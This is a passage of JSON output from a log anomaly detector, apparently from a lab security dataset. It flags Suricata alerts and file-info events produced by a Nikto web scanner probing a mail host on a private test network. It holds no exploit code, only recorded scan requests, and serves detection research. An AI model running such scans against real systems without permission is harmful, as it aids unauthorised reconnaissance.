"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1618846172187243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80", "/parser/model/time": 1583349514.268069, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46880, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsconfig", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.268291, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":127685066625492,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46880, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":127685066625492,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 127685066625492, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80", "/parser/model/time": 1583349514.270141, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46882, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.axd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.27036, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":531532251536341,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46882, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":531532251536341,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 531532251536341, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80", "/parser/model/time": 1583349514.272047, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46884, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.272047 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46884 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.show", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.272253, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":477548807594957,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.show\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.show", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
